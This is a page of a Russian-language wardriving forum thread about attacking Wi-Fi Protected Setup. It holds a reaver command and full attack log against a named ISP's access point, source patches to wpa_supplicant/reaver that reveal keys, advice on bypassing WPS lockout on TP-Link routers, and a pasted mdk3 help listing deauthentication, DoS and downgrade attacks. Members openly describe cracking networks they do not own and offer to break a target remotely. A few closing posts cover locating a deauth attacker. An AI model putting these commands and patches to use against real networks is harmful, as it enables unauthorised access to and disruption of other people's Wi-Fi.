Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Там точно pin пустой, а почему key не показывает - надо включать более подробный лог - в файле wpa_debug.c
    int wpa_debug_level = MSG_INFO;
    int wpa_debug_show_keys = 0;
    поменять на
    int wpa_debug_level = 0;
    int wpa_debug_show_keys = 1;

    Upd: Похоже, что когда E-Hash1==E-Hash2, то первым делом надо проверять на пустой pin
     
    #3921 VasiliyP, 29 Mar 2017
    Last edited: 29 Mar 2017
    binarymaster likes this.
  2. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin "�p��p�"
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    Ошибка сегментирования
     
    roofless and binarymaster like this.
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Видимо там, где происходит получение строки из get_static_p1(), нужно делать её дубликат, т.е. обернуть в strdup().
    Интересное наблюдение!
     
  4. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    root@kali:~/reaver/src# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -p "" -N

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

    [+] Switching wlan0mon to channel 6
    [+] Waiting for beacon from D4:76:EA:xx:xx:xx
    [+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=0):
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin ""
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    WPS: Processing received message (len=539 op_code=4)
    WPS: Received WSC_MSG
    WPS: attr type=0x104a len=1

    .................................

    [+] Received M5 message
    WPS: Processing received message (len=158 op_code=4)
    WPS: Received WSC_MSG
    WPS: attr type=0x104a len=1
    WPS: attr type=0x1022 len=1
    WPS: attr type=0x1039 len=16
    WPS: attr type=0x1018 len=112
    WPS: attr type=0x1005 len=8
    WPS: Parsed WSC_MSG
    WPS: Received M7
    WPS: Unexpected state (12) for receiving M7
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M7 message
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    [+] Pin cracked in 15 seconds
    [+] WPS PIN: ''
    [+] Nothing done, nothing to save.
    WPS: Full PIN information revealed and negotiation failed
    WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 41 44 53 4c 20 4d

    Внес свежие изменения, пересобрал. Пароль не сдает.
     
  5. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    А попробуйте в файле wps_registrar.c заменить строчку
    if (wps->state != RECV_M7) {
    на
    if (0) {
    Авось поможет. Постоянные повторы принятых пакетов - это может быть и с адаптером связано.
     
  6. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Попробовал. Без изменений.
     
  7. Elusive

    Elusive New Member

    Joined:
    8 Jan 2011
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Почитал тему, возник вопрос, есть ли решение обойти wps lock на tp link (С0:4A:00)
    При обычном переборе возникает
    Code:
    warning: detected ap rate limiting, waiting 60 seconds before re-checking
    Пробовал mdk3,выдает
    Code:
    mdk3 device seems to be invulnerable
    .
    Если увел время между перебором или еще что-то, толк от этого будет?

    wifislax 4.12. (722n)
     
  8. Andrey9999

    Andrey9999 Elder - Старейшина

    Joined:
    23 May 2012
    Messages:
    3,273
    Likes Received:
    32,489
    Reputations:
    74
    с WPS вряд ли что-то получится
    ловите хендшейк...
     
  9. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Некоторые tp-link выставляют флаг locked, но wps продолжает работать. В reaver для этой ситуации есть флаг -L.
    Если же все методы (хендшейк в т.ч.) окажутся безуспешными, могу попробовать его раскрутить, после того, как разлочится. Для этого нужен ssh сервер, и устойчивый сигнал с/до цели. По времени - примерно как reaver'ом.
     
  10. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Насколько я понял из вашей с ним переписки, у вас нет доступа к вебке таких роутеров? Если помогу организовать такой доступ, дело шустрее пойдет?

    Только сейчас заметил, то в теме про роутерскан эти точки уже изучаются...
     
    #3930 startless, 5 Apr 2017
    Last edited: 5 Apr 2017
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Учитывая, что относительно недавно была выложена последняя ночная сборка RS, я переключился на другое. Но писать в ту тему смысл есть, возможно кто-нибудь из нашей команды реализует.
     
    startless likes this.
  12. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Я тут только что прошелся как раз новой сборкой по своему региону и обнаружил несколько десятков таких точек. Они не совсем корректно парсятся. Запостил в ветку роутерскана. Сейчас добавлю туда еще список таких же точек на случай, если та исчезнет.
     
    roofless likes this.
  13. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Есть подозрение, что кто-то пытается ломануть мой wi-fi, ибо периодически сеть падает и тут же появляется, судя по индикации на андрюше. Стало быть, ловит хендшейк. Вопрос! Как вычислить негодяя?
     
  14. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Вот значит вы как, да? Теперь значит, негодяи? :D
    Отследить очень тяжело, даже с помощью спецоборудования. Процесс деаутентификации очень короток(слишком мало времени для лоцирования), остальное время "негодяй" слушает(принимает) а не говорит(передаёт).
    Хотя, если вы профессионально играете в "Охоту на лиc" .. всё возможно. ;)
    Другой случай, если у вас длительно пытаются получить хендшейк(а не получается) например с помощью MDK3, замусоривая эфир. Тогда проще. Есть время лоцировать источник.
     
    #3934 Kakoluk, 12 Apr 2017
    Last edited: 12 Apr 2017
    quite gray and TOX1C like this.
  15. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Такое же бывает, когда у роутера или в его блоке питания конденсаторы пересыхают от старости.
     
    quite gray and Kakoluk like this.
  16. startless

    startless Member

    Joined:
    20 Jun 2015
    Messages:
    135
    Likes Received:
    96
    Reputations:
    0
    Я же шутю! Сам такой же негодяй :D. Просто интересно стало, как повернуть процесс вспять и попытаться вычислить "лису". Тем самым и себя обезопасить.
    Кстати, в commview для wifi, помню, есть такая функция, когда прога рисует схему взаимодействия узлов на основе анализа мониторинга пакетов. Только вот мой текущий адаптер она не поддерживает. Может в кали есть что-то подобное?
    Да, роутер оказался в порядке и кондеры живые. Какая-то ошибка в конфиге. Дефолтнул, загрузил сохраненный конфиг - опять сигнал пляшет. Снова дефолт, ручками прописываю настройки - все, полет нормальный.
     
  17. Naurlock

    Naurlock New Member

    Joined:
    6 Apr 2017
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Оч. интересно как это можно сделать? расскажете или мож ткнёте куда почитать?)
     
  18. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    MDK 3.0 v6 - "Yeah, well, whatever"
    by ASPj of k2wrlz, using the osdep library from aircrack-ng
    And with lots of help from the great aircrack-ng community:
    Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
    telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
    THANK YOU!

    MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
    IMPORTANT: It is your responsibility to make sure you have permission from the
    network owner before running MDK against it.

    This code is licenced under the GPLv2

    MDK USAGE:
    mdk3 <interface> <test_mode> [test_options]

    Try mdk3 --fullhelp for all test options
    Try mdk3 --help <test_mode> for info about one test only

    TEST MODES:
    b - Beacon Flood Mode
    Sends beacon frames to show fake APs at clients.
    This can sometimes crash network scanners and even drivers!
    a - Authentication DoS mode
    Sends authentication frames to all APs found in range.
    Too much clients freeze or reset some APs.
    p - Basic probing and ESSID Bruteforce mode
    Probes AP and check for answer, useful for checking if SSID has
    been correctly decloaked or if AP is in your adaptors sending range
    SSID Bruteforcing is also possible with this test mode.
    d - Deauthentication / Disassociation Amok Mode
    Kicks everybody found from AP
    m - Michael shutdown exploitation (TKIP)
    Cancels all traffic continuously
    x - 802.1X tests
    w - WIDS/WIPS Confusion
    Confuse/Abuse Intrusion Detection and Prevention Systems
    f - MAC filter bruteforce mode
    This test uses a list of known client MAC Adresses and tries to
    authenticate them to the given AP while dynamically changing
    its response timeout for best performance. It currently works only
    on APs who deny an open authentication request properly
    g - WPA Downgrade test
    deauthenticates Stations and APs sending WPA encrypted packets.
    With this test you can check if the sysadmin will try setting his
    network to WEP or disable encryption.









    MDK 3.0 v6 - "Yeah, well, whatever"
    by ASPj of k2wrlz, using the osdep library from aircrack-ng
    And with lots of help from the great aircrack-ng community:
    Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
    telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
    THANK YOU!

    MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
    IMPORTANT: It is your responsibility to make sure you have permission from the
    network owner before running MDK against it.

    This code is licenced under the GPLv2

    MDK USAGE:
    mdk3 <interface> <test_mode> [test_options]

    Try mdk3 --fullhelp for all test options
    Try mdk3 --help <test_mode> for info about one test only

    TEST MODES:
    b - Beacon Flood Mode
    Sends beacon frames to show fake APs at clients.
    This can sometimes crash network scanners and even drivers!
    a - Authentication DoS mode
    Sends authentication frames to all APs found in range.
    Too much clients freeze or reset some APs.
    p - Basic probing and ESSID Bruteforce mode
    Probes AP and check for answer, useful for checking if SSID has
    been correctly decloaked or if AP is in your adaptors sending range
    SSID Bruteforcing is also possible with this test mode.
    d - Deauthentication / Disassociation Amok Mode
    Kicks everybody found from AP
    m - Michael shutdown exploitation (TKIP)
    Cancels all traffic continuously
    x - 802.1X tests
    w - WIDS/WIPS Confusion
    Confuse/Abuse Intrusion Detection and Prevention Systems
    f - MAC filter bruteforce mode
    This test uses a list of known client MAC Adresses and tries to
    authenticate them to the given AP while dynamically changing
    its response timeout for best performance. It currently works only
    on APs who deny an open authentication request properly
    g - WPA Downgrade test
    deauthenticates Stations and APs sending WPA encrypted packets.
    With this test you can check if the sysadmin will try setting his
    network to WEP or disable encryption.


    b - Beacon Flood Mode
    Sends beacon frames to show fake APs at clients.
    This can sometimes crash network scanners and even drivers!
    OPTIONS:
    -n <ssid>
    Use SSID <ssid> instead of randomly generated ones
    -f <filename>
    Read SSIDs from file
    -v <filename>
    Read MACs and SSIDs from file. See example file!
    -d
    Show station as Ad-Hoc
    -w
    Set WEP bit (Generates encrypted networks)
    -g
    Show station as 54 Mbit
    -t
    Show station using WPA TKIP encryption
    -a
    Show station using WPA AES encryption
    -m
    Use valid accesspoint MAC from OUI database
    -h
    Hop to channel where AP is spoofed
    This makes the test more effective against some devices/drivers
    But it reduces packet rate due to channel hopping.
    -c <chan>
    Fake an AP on channel <chan>. If you want your card to hop on
    this channel, you have to set -h option, too!
    -s <pps>
    Set speed in packets per second (Default: 50)
    a - Authentication DoS mode
    Sends authentication frames to all APs found in range.
    Too much clients freeze or reset almost every AP.
    OPTIONS:
    -a <ap_mac>
    Only test the specified AP
    -m
    Use valid client MAC from OUI database
    -c
    Do NOT check for test being successful
    -i <ap_mac>
    Perform intelligent test on AP (-a and -c will be ignored)
    This test connects clients to the AP and reinjects sniffed data to keep them alive
    -s <pps>
    Set speed in packets per second (Default: unlimited)
    p - Basic probing and ESSID Bruteforce mode
    Probes AP and check for answer, useful for checking if SSID has
    been correctly decloaked or if AP is in your adaptors sending range
    Use -f and -t option to enable SSID Bruteforcing.
    OPTIONS:
    -e <ssid>
    Tell mdk3 which SSID to probe for
    -f <filename>
    Read lines from file for bruteforcing hidden SSIDs
    -t <bssid>
    Set MAC adress of target AP
    -s <pps>
    Set speed (Default: unlimited, in Bruteforce mode: 300)
    -b <character set>
    Use full Bruteforce mode (recommended for short SSIDs only!)
    Use this switch only to show its help screen.
    d - Deauthentication / Disassociation Amok Mode
    Kicks everybody found from AP
    OPTIONS:
    -w <filename>
    Read file containing MACs not to care about (Whitelist mode)
    -b <filename>
    Read file containing MACs to run test on (Blacklist Mode)
    -s <pps>
    Set speed in packets per second (Default: unlimited)
    -c [chan,chan,chan,...]
    Enable channel hopping. Without providing any channels, mdk3 will hop an all
    14 b/g channels. Channel will be changed every 5 seconds.
    m - Michael shutdown exploitation (TKIP)
    Cancels all traffic continuously
    -t <bssid>
    Set Mac address of target AP
    -w <seconds>
    Seconds between bursts (Default: 10)
    -n <ppb>
    Set packets per burst (Default: 70)
    -j
    Use the new TKIP QoS-Exploit
    Needs just a few packets to shut AP down!
    -s <pps>
    Set speed (Default: 400)
    x - 802.1X tests
    0 - EAPOL Start packet flooding
    -n <ssid>
    Use SSID <ssid>
    -t <bssid>
    Set MAC address of target AP
    -w <WPA type>
    Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)
    -u <unicast cipher>
    Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
    -m <multicast cipher>
    Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
    -s <pps>
    Set speed (Default: 400)
    1 - EAPOL Logoff test
    -t <bssid>
    Set MAC address of target AP
    -c <bssid>
    Set MAC address of target STA
    -s <pps>
    Set speed (Default: 400)
    w - WIDS/WIPS/WDS Confusion
    Confuses a WDS with multi-authenticated clients which messes up routing tables
    -e <SSID>
    SSID of target WDS network
    -c [chan,chan,chan...]
    Use channel hopping
    -z
    activate Zero_Chaos' WIDS exploit
    (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
    f - MAC filter bruteforce mode
    This test uses a list of known client MAC Adresses and tries to
    authenticate them to the given AP while dynamically changing
    its response timeout for best performance. It currently works only
    on APs who deny an open authentication request properly
    -t <bssid>
    Target BSSID
    -m <mac>
    Set the MAC adress range to use (3 bytes, i.e. 00:12:34)
    Without -m, the internal database will be used
    -f <mac>
    Set the MAC adress to begin bruteforcing with
    (Note: You can't use -f and -m at the same time)
    g - WPA Downgrade test
    deauthenticates Stations and APs sending WPA encrypted packets.
    With this test you can check if the sysadmin will try setting his
    network to WEP or disable encryption. mdk3 will let WEP and unencrypted
    clients work, so if the sysadmin simply thinks "WPA is broken" he
    sure isn't the right one for this job.
    (this can/should be combined with social engineering)
    -t <bssid> Target network
    Прослушиваем эфир в мониторе, видим подозрительную активность связанную с вашим BSSID(чужой(ие) клиент(ы)),
    ходим с ноутбуком по подъезду с прицелом на уровень сигнала этого клиента(ов) и находим максимум сигнала перед одной из хат.
    Если это фейк-точка(с вашим BSSID) то сложнее, можно запутатся в уровнях сигнала вашей точки и паразитной.
    Придётся начать от противного, отойти подальше от своего местоположения, и намеренно искать максимум "своего" сигнала, при этом стараясь НЕ приближаться к себе(к вашей точке). Слепой поиск(ощупывание по кругу). Лучше всего в этот момент выключить вашу AP и просто поискать(по уровню сигнала) точку с вашим "BSSID". Это и будет "лиса".
    Что то в этом роде, если нет направленных антенн(только ноут с "всенаправленой" антенной в крышке монитора). :)
    А вообще, по идее можно программу написать - которая бы автоматизировала такой процесс наблюдения, а если ещё и узконаправленную антенну прикрутить! :D
     
    #3938 Kakoluk, 13 Apr 2017
    Last edited: 13 Apr 2017
  19. Naurlock

    Naurlock New Member

    Joined:
    6 Apr 2017
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Ну вообще, да) логично, я уж думал, там что-то сверх запутанное с использованием спец.средств.спасибо!
     
  20. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Спец.средства, в этом случае(просто название узкоспециализированного оборудования) - это остронаправленная антенна+заточенное для локации оборудование.
    Им может быть и обычный ноутбук с соответствующим ПО.